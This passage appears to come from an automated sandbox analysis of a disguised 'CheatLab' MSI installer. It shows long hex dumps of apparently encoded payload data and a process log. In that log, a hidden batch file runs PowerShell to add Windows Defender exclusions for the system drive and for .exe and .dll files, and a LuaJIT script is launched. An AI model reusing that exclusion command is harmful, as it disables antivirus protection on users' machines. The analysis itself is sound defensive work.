34 32 2c 31 31 32 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33
                                                                                                                                                                                                                            Data Ascii: 5,155,146,156,a1,138,129,12a,be,135,140,122,a2,15e,13d,143,c5,146,145,155,c8,12a,9d,113,144,15f,9e,113,134,126,87,df,142,155,ab,105,149,138,90,dc,161,135,a9,d6,13f,15e,a8,f9,15c,146,b8,110,153,12a,a4,11f,14b,15f,ad,125,134,128,95,f1,142,112,146,156,149,13
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1579INData Raw: 2c 62 64 2c 31 33 66 2c 31 35 65 2c 38 65 2c 64 63 2c 31 35 63 2c 31 34 36 2c 39 61 2c 65 66 2c 31 35 33 2c 31 32 61 2c 38 32 2c 66 61 2c 31 34 62 2c 31 35 66 2c 39 37 2c 31 30 34 2c 31 32 35 2c 31 32 36 2c 31 32 33 2c 31 33 32 2c 39 30 2c 31 35 35 2c 31 34 36 2c 31 35 36 2c 39 31 2c 31 33 38 2c 31 32 39 2c 31 32 61 2c 61 33 2c 31 33 35 2c 31 34 30 2c 31 32 32 2c 37 62 2c 31 35 65 2c 31 33 64 2c 31 34 33 2c 39 33 2c 31 34 36 2c 31 34 62 2c 31 35 38 2c 38 34 2c 31 32 61 2c 31 33 35 2c 31 36 35 2c 37 37 2c 31 35 66 2c 31 33 63 2c 31 36 38 2c 35 62 2c 31 32 36 2c 31 32 33 2c 31 33 32 2c 36 34 2c 31 35 35 2c 31 34 36 2c 31 35 36 2c 36 38 2c 31 33 38 2c 31 32 39 2c 31 32 61 2c 37 63 2c 31 33 35 2c 31 34 30 2c 31 32 32 2c 35 37 2c 31 35 65 2c 31 33 64 2c 31 34
                                                                                                                                                                                                                            Data Ascii: ,bd,13f,15e,8e,dc,15c,146,9a,ef,153,12a,82,fa,14b,15f,97,104,125,126,123,132,90,155,146,156,91,138,129,12a,a3,135,140,122,7b,15e,13d,143,93,146,14b,158,84,12a,135,165,77,15f,13c,168,5b,126,123,132,64,155,146,156,68,138,129,12a,7c,135,140,122,57,15e,13d,14
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1595INData Raw: 2c 31 32 61 2c 62 37 2c 61 66 2c 31 34 66 2c 31 35 66 2c 62 66 2c 62 32 2c 31 33 38 2c 31 32 36 2c 61 37 2c 37 64 2c 31 34 36 2c 31 35 35 2c 63 62 2c 61 32 2c 31 34 64 2c 31 33 38 2c 62 31 2c 37 37 2c 31 36 35 2c 31 33 35 2c 63 61 2c 37 31 2c 31 34 33 2c 31 35 65 2c 63 61 2c 39 34 2c 31 35 66 2c 31 34 36 2c 64 62 2c 61 62 2c 31 35 36 2c 31 32 61 2c 63 39 2c 62 61 2c 31 34 65 2c 31 35 66 2c 64 33 2c 63 30 2c 31 33 36 2c 31 32 36 2c 31 31 30 2c 31 31 33 2c 38 35 2c 31 35 35 2c 31 34 36 2c 31 35 36 2c 61 31 2c 31 33 38 2c 31 32 39 2c 31 32 61 2c 62 66 2c 31 33 35 2c 31 34 30 2c 31 32 32 2c 61 33 2c 31 35 65 2c 31 33 64 2c 31 34 33 2c 63 36 2c 31 34 36 2c 31 32 63 2c 31 34 31 2c 64 38 2c 31 32 61 2c 37 62 2c 61 35 2c 66 31 2c 31 35 66 2c 38 32 2c 61 38 2c 64
                                                                                                                                                                                                                            Data Ascii: ,12a,b7,af,14f,15f,bf,b2,138,126,a7,7d,146,155,cb,a2,14d,138,b1,77,165,135,ca,71,143,15e,ca,94,15f,146,db,ab,156,12a,c9,ba,14e,15f,d3,c0,136,126,110,113,85,155,146,156,a1,138,129,12a,bf,135,140,122,a3,15e,13d,143,c6,146,12c,141,d8,12a,7b,a5,f1,15f,82,a8,d
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1611INData Raw: 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34
                                                                                                                                                                                                                            Data Ascii: ,158,153,129,135,165,14b,15e,13c,168,134,125,123,132,142,154,146,156,149,137,129,12a,161,134,140,122,13f,15d,13d,143,15c,145,14b,158,153,129,135,165,14b,15e,13c,168,134,125,123,132,142,154,146,156,149,137,129,12a,161,134,140,122,13f,15d,13d,143,15c,145,14
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1627INData Raw: 35 2c 63 33 2c 31 35 65 2c 36 31 2c 36 66 2c 65 66 2c 31 34 36 2c 36 36 2c 37 31 2c 63 61 2c 31 32 61 2c 34 63 2c 37 61 2c 62 65 2c 31 35 66 2c 34 66 2c 37 61 2c 61 33 2c 31 32 36 2c 33 32 2c 31 34 30 2c 61 64 2c 31 35 35 2c 31 35 32 2c 31 36 31 2c 62 30 2c 31 33 38 2c 33 66 2c 33 66 2c 63 34 2c 31 33 35 2c 37 38 2c 35 39 2c 39 62 2c 31 35 65 2c 39 36 2c 39 62 2c 62 30 2c 31 34 36 2c 63 36 2c 64 33 2c 61 31 2c 31 32 61 2c 64 32 2c 31 30 32 2c 39 31 2c 31 35 66 2c 66 63 2c 31 32 38 2c 37 34 2c 31 32 36 2c 66 39 2c 31 30 38 2c 37 64 2c 31 35 35 2c 31 32 37 2c 31 33 37 2c 38 32 2c 31 33 38 2c 31 31 38 2c 31 31 39 2c 39 38 2c 31 33 35 2c 31 32 66 2c 31 31 31 2c 37 36 2c 31 35 65 2c 31 33 30 2c 31 33 36 2c 39 32 2c 31 34 36 2c 31 33 61 2c 31 34 37 2c 38 61 2c
                                                                                                                                                                                                                            Data Ascii: 5,c3,15e,61,6f,ef,146,66,71,ca,12a,4c,7a,be,15f,4f,7a,a3,126,32,140,ad,155,152,161,b0,138,3f,3f,c4,135,78,59,9b,15e,96,9b,b0,146,c6,d3,a1,12a,d2,102,91,15f,fc,128,74,126,f9,108,7d,155,127,137,82,138,118,119,98,135,12f,111,76,15e,130,136,92,146,13a,147,8a,
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1643INData Raw: 64 37 2c 64 35 2c 36 34 2c 31 32 61 2c 63 64 2c 64 32 2c 31 35 33 2c 31 35 66 2c 64 65 2c 63 37 2c 31 33 35 2c 31 32 36 2c 63 33 2c 62 61 2c 38 38 2c 36 65 2c 31 34 36 2c 31 35 36 2c 36 36 2c 31 33 38 2c 31 32 39 2c 31 32 61 2c 38 32 2c 31 33 35 2c 31 34 30 2c 31 32 32 2c 36 36 2c 31 35 65 2c 31 33 64 2c 31 34 33 2c 38 39 2c 31 34 36 2c 31 34 62 2c 31 35 38 2c 38 36 2c 31 32 61 2c 31 33 35 2c 31 36 35 2c 38 34 2c 31 35 66 2c 31 33 63 2c 31 36 38 2c 37 33 2c 31 32 36 2c 31 32 33 2c 31 33 32 2c 38 37 2c 31 35 35 2c 31 34 36 2c 31 35 36 2c 39 34 2c 36 31 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c
                                                                                                                                                                                                                            Data Ascii: d7,d5,64,12a,cd,d2,153,15f,de,c7,135,126,c3,ba,88,6e,146,156,66,138,129,12a,82,135,140,122,66,15e,13d,143,89,146,14b,158,86,12a,135,165,84,15f,13c,168,73,126,123,132,87,155,146,156,94,61,129,12a,161,134,140,122,13f,15d,13d,143,15c,145,14b,158,153,129,135,
                                                                                                                                                                                                                            2023-11-04 00:35:24 UTC1659INData Raw: 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c
                                                                                                                                                                                                                            Data Ascii: 58,153,129,135,165,14b,15e,13c,168,134,125,123,132,142,154,146,156,149,137,129,12a,161,134,140,122,13f,15d,13d,143,15c,145,14b,158,153,129,135,165,14b,15e,13c,168,134,125,123,132,142,154,146,156,149,137,129,12a,161,134,140,122,13f,15d,13d,143,15c,145,14b,
                                                                                                                                                                                                                            2023-11-04 00:35:24 UTC1675INData Raw: 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c
                                                                                                                                                                                                                            Data Ascii: 58,153,129,135,165,14b,15e,13c,168,134,125,123,132,142,154,146,156,149,137,129,12a,161,134,140,122,13f,15d,13d,143,15c,145,14b,158,153,129,135,165,14b,15e,13c,168,134,125,123,132,142,154,146,156,149,137,129,12a,161,134,140,122,13f,15d,13d,143,15c,145,14b,
                                                                                                                                                                                                                            2023-11-04 00:35:24 UTC1691INData Raw: 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 34 2c 31 34 63 2c 31 35 66 2c 31 33 64 2c 31 36 39 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 35 2c 31 34 61 2c 31 33 38 2c 31 32 61 2c 31 32 63 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 64 2c 31 34 36 2c 31 34 63 2c 31 35 61 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 35 2c 31 32 36 2c 31 32 34 2c 31 33 34 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 32 2c 31 33 35 2c 31 34 31 2c 31 32 34 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63
                                                                                                                                                                                                                            Data Ascii: 145,14b,158,153,129,135,164,14c,15f,13d,169,134,125,123,132,142,154,146,155,14a,138,12a,12c,161,134,140,122,13f,15d,13d,143,15d,146,14c,15a,153,129,135,165,14b,15e,13c,168,135,126,124,134,142,154,146,156,149,137,129,12a,162,135,141,124,13f,15d,13d,143,15c
                                                                                                                                                                                                                            2023-11-04 00:35:24 UTC1707INData Raw: 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35
                                                                                                                                                                                                                            Data Ascii: 4,32,41,51,63,55,65,58,46,38,39,70,43,4f,31,4e,6c,4c,52,6b,54,5a,67,62,38,44,74,5a,6d,4b,77,43,34,32,41,51,63,55,65,58,46,38,39,70,43,4f,31,4e,6c,4c,52,6b,54,5a,67,62,38,44,74,5a,6d,4b,77,43,34,32,41,51,63,55,65,58,46,38,39,70,43,4f,31,4e,6c,4c,52,6b,54,5
                                                                                                                                                                                                                            2023-11-04 00:35:24 UTC1723INData Raw: 39 36 2c 34 31 2c 31 33 66 2c 36 33 2c 39 62 2c 64 37 2c 62 64 2c 61 62 2c 37 64 2c 61 37 2c 65 36 2c 61 63 2c 63 31 2c 61 30 2c 62 63 2c 64 39 2c 62 31 2c 63 30 2c 64 66 2c 61 37 2c 63 65 2c 64 39 2c 63 62 2c 61 36 2c 61 62 2c 65 37 2c 39 62 2c 36 64 2c 39 38 2c 37 38 2c 38 61 2c 39 39 2c 61 36 2c 38 36 2c 62 66 2c 64 39 2c 62 65 2c 64 37 2c 63 37 2c 62 34 2c 61 35 2c 39 65 2c 64 65 2c 62 37 2c 61 32 2c 61 35 2c 63 30 2c 64 35 2c 62 61 2c 62 39 2c 64 65 2c 35 34 2c 31 34 39 2c 36 37 2c 61 38 2c 61 61 2c 61 39 2c 64 39 2c 39 66 2c 64 62 2c 63 31 2c 65 30 2c 62 35 2c 61 33 2c 61 30 2c 61 65 2c 62 36 2c 64 31 2c 63 39 2c 62 38 2c 63 63 2c 62 38 2c 61 31 2c 61 37 2c 64 37 2c 62 36 2c 61 36 2c 33 31 2c 39 64 2c 36 64 2c 39 33 2c 62 37 2c 64 66 2c 39 39 2c 63
                                                                                                                                                                                                                            Data Ascii: 96,41,13f,63,9b,d7,bd,ab,7d,a7,e6,ac,c1,a0,bc,d9,b1,c0,df,a7,ce,d9,cb,a6,ab,e7,9b,6d,98,78,8a,99,a6,86,bf,d9,be,d7,c7,b4,a5,9e,de,b7,a2,a5,c0,d5,ba,b9,de,54,149,67,a8,aa,a9,d9,9f,db,c1,e0,b5,a3,a0,ae,b6,d1,c9,b8,cc,b8,a1,a7,d7,b6,a6,31,9d,6d,93,b7,df,99,c
                                                                                                                                                                                                                            2023-11-04 00:35:24 UTC1739INData Raw: 31 31 36 2c 37 33 2c 38 37 2c 36 64 2c 31 31 65 2c 62 32 2c 38 32 2c 38 37 2c 65 37 2c 66 30 2c 31 31 34 2c 31 35 35 2c 31 32 35 2c 31 30 64 2c 31 33 64 2c 37 65 2c 64 30 2c 31 36 37 2c 63 39 2c 37 63 2c 35 65 2c 37 34 2c 66 63 2c 64 33 2c 38 36 2c 31 34 63 2c 31 32 61 2c 64 66 2c 31 32 39 2c 66 62 2c 62 37 2c 33 39 2c 31 31 65 2c 65 63 2c 64 66 2c 64 62 2c 31 31 33 2c 65 62 2c 34 64 2c 65 65 2c 37 62 2c 31 30 35 2c 37 30 2c 31 36 33 2c 31 32 65 2c 61 36 2c 35 63 2c 31 35 30 2c 63 39 2c 63 66 2c 31 34 39 2c 31 31 64 2c 39 33 2c 64 62 2c 65 61 2c 62 63 2c 31 30 39 2c 31 30 30 2c 36 61 2c 61 34 2c 31 35 36 2c 36 36 2c 34 34 2c 61 65 2c 31 33 38 2c 36 35 2c 61 39 2c 34 34 2c 65 33 2c 38 35 2c 64 63 2c 35 32 2c 31 35 34 2c 36 65 2c 31 32 66 2c 31 32 39 2c 65
                                                                                                                                                                                                                            Data Ascii: 116,73,87,6d,11e,b2,82,87,e7,f0,114,155,125,10d,13d,7e,d0,167,c9,7c,5e,74,fc,d3,86,14c,12a,df,129,fb,b7,39,11e,ec,df,db,113,eb,4d,ee,7b,105,70,163,12e,a6,5c,150,c9,cf,149,11d,93,db,ea,bc,109,100,6a,a4,156,66,44,ae,138,65,a9,44,e3,85,dc,52,154,6e,12f,129,e
                                                                                                                                                                                                                            2023-11-04 00:35:24 UTC1755INData Raw: 32 2c 38 65 2c 31 33 63 2c 31 30 33 2c 36 35 2c 38 66 2c 31 32 31 2c 31 33 36 2c 38 34 2c 64 61 2c 37 32 2c 31 32 38 2c 31 31 32 2c 31 30 37 2c 31 35 32 2c 37 66 2c 65 38 2c 64 35 2c 31 30 62 2c 35 38 2c 61 63 2c 31 33 35 2c 39 62 2c 63 38 2c 31 31 30 2c 66 65 2c 34 37 2c 38 37 2c 66 36 2c 61 66 2c 37 65 2c 63 37 2c 64 65 2c 39 61 2c 31 31 39 2c 31 34 37 2c 31 31 36 2c 31 30 30 2c 63 66 2c 31 34 37 2c 37 31 2c 63 31 2c 36 62 2c 37 64 2c 66 62 2c 39 62 2c 65 35 2c 63 35 2c 61 66 2c 31 32 63 2c 64 30 2c 31 31 33 2c 31 31 65 2c 37 34 2c 31 36 30 2c 37 32 2c 38 64 2c 31 32 62 2c 31 30 64 2c 31 33 31 2c 31 32 31 2c 31 36 31 2c 64 62 2c 61 65 2c 31 32 63 2c 37 39 2c 31 34 34 2c 63 61 2c 31 34 34 2c 62 31 2c 66 31 2c 63 66 2c 39 33 2c 38 30 2c 35 66 2c 37 30 2c
                                                                                                                                                                                                                            Data Ascii: 2,8e,13c,103,65,8f,121,136,84,da,72,128,112,107,152,7f,e8,d5,10b,58,ac,135,9b,c8,110,fe,47,87,f6,af,7e,c7,de,9a,119,147,116,100,cf,147,71,c1,6b,7d,fb,9b,e5,c5,af,12c,d0,113,11e,74,160,72,8d,12b,10d,131,121,161,db,ae,12c,79,144,ca,144,b1,f1,cf,93,80,5f,70,


                                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                            Start time:01:35:01
                                                                                                                                                                                                                            Start date:04/11/2023
                                                                                                                                                                                                                            Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Cheat.Lab.2.7.1.msi"
                                                                                                                                                                                                                            Imagebase:0x7ff778850000
                                                                                                                                                                                                                            File size:69'632 bytes
                                                                                                                                                                                                                            MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                                            Start time:01:35:01
                                                                                                                                                                                                                            Start date:04/11/2023
                                                                                                                                                                                                                            Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                            Imagebase:0x7ff778850000
                                                                                                                                                                                                                            File size:69'632 bytes
                                                                                                                                                                                                                            MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                            Start time:01:35:01
                                                                                                                                                                                                                            Start date:04/11/2023
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 5E03ED5AB1478F6152C3A4AE0716FC8E C
                                                                                                                                                                                                                            Imagebase:0x4a0000
                                                                                                                                                                                                                            File size:59'904 bytes
                                                                                                                                                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                            Start time:01:35:09
                                                                                                                                                                                                                            Start date:04/11/2023
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding F39516897EEA46074340BE595843CEF6
                                                                                                                                                                                                                            Imagebase:0x4a0000
                                                                                                                                                                                                                            File size:59'904 bytes
                                                                                                                                                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                                            Start time:01:35:10
                                                                                                                                                                                                                            Start date:04/11/2023
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 3B80CDA5B5BAFA68ED05607E689893EE E Global\MSI0000
                                                                                                                                                                                                                            Imagebase:0x4a0000
                                                                                                                                                                                                                            File size:59'904 bytes
                                                                                                                                                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                                            Start time:01:35:10
                                                                                                                                                                                                                            Start date:04/11/2023
                                                                                                                                                                                                                            Path:C:\Windows\Installer\MSIF5A3.tmp
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Windows\Installer\MSIF5A3.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.bat
                                                                                                                                                                                                                            Imagebase:0x5e0000
                                                                                                                                                                                                                            File size:399'328 bytes
                                                                                                                                                                                                                            MD5 hash:B9545ED17695A32FACE8C3408A6A3553
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                                            Start time:01:35:10
                                                                                                                                                                                                                            Start date:04/11/2023
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Windows\System32\cmd.exe" /C ""C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.bat"
                                                                                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                                            Start time:01:35:10
                                                                                                                                                                                                                            Start date:04/11/2023
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                                            Start time:01:35:10
                                                                                                                                                                                                                            Start date:04/11/2023
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"
                                                                                                                                                                                                                            Imagebase:0x4e0000
                                                                                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                                            Start time:01:35:12
                                                                                                                                                                                                                            Start date:04/11/2023
                                                                                                                                                                                                                            Path:C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua
                                                                                                                                                                                                                            Imagebase:0x7ff772380000
                                                                                                                                                                                                                            File size:1'159'194 bytes
                                                                                                                                                                                                                            MD5 hash:95B55371B50778590D2468C3B9D3EEAE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                            • Detection: 3%, Virustotal, Browse
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                                            Start time:01:35:15
                                                                                                                                                                                                                            Start date:04/11/2023
                                                                                                                                                                                                                            Path:C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
